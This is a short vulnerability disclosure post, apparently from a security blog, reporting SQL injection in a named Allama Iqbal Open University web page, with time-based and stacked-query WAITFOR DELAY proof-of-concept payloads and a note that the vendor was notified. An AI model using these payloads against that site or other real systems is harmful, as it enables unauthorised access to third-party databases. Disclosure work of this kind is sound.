http://www.aiou.edu.pk – sql vulnerability

www.hu.edu.pk – Sql Vulnerability
July 26, 2016
www.ogra.org.pk/ – (Error Based Injection)
July 26, 2016
www.hu.edu.pk – Sql Vulnerability
July 26, 2016
www.ogra.org.pk/ – (Error Based Injection)
July 26, 2016

http://www.aiou.edu.pk – sql vulnerability

Allama Iqbal Open University

website : http://www.aiou.edu.pk/All_Dept_List.asp?dt=1 (GET)

vuln type : sql injection

submitted by : Waqas Haider

Poc :

Parameter: dt (GET)

Type: stacked queries

Title: Microsoft SQL Server/Sybase stacked queries

Payload: dt=1;WAITFOR DELAY '0:0:5'–

Type: AND/OR time-based blind

Title: Microsoft SQL Server/Sybase time-based blind

Payload: dt=1 WAITFOR DELAY '0:0:5'

Notification : Vendor Notified

Related posts

Secure AI system development
November 30, 2023

Secure AI system development

Read more
Cyber Supply Chain Risk Management
November 11, 2023

Best Practices for Safeguarding Software Supply Chains: Adopting Software Bill of Materials

Read more
October 24, 2023

Mitigating Cisco IOS XE Web UI Vulnerabilities – CVE-2023-20198 and CVE-2023-20273

Read more

Leave a Reply

http://www.aiou.edu.pk – sql vulnerability
We value your privacy
We use cookies to enhance your browsing experience, serve personalized content, and analyze our traffic. By clicking "Accept All", and by using this website you agree to our Cookies and Data Protection Policy.
Read more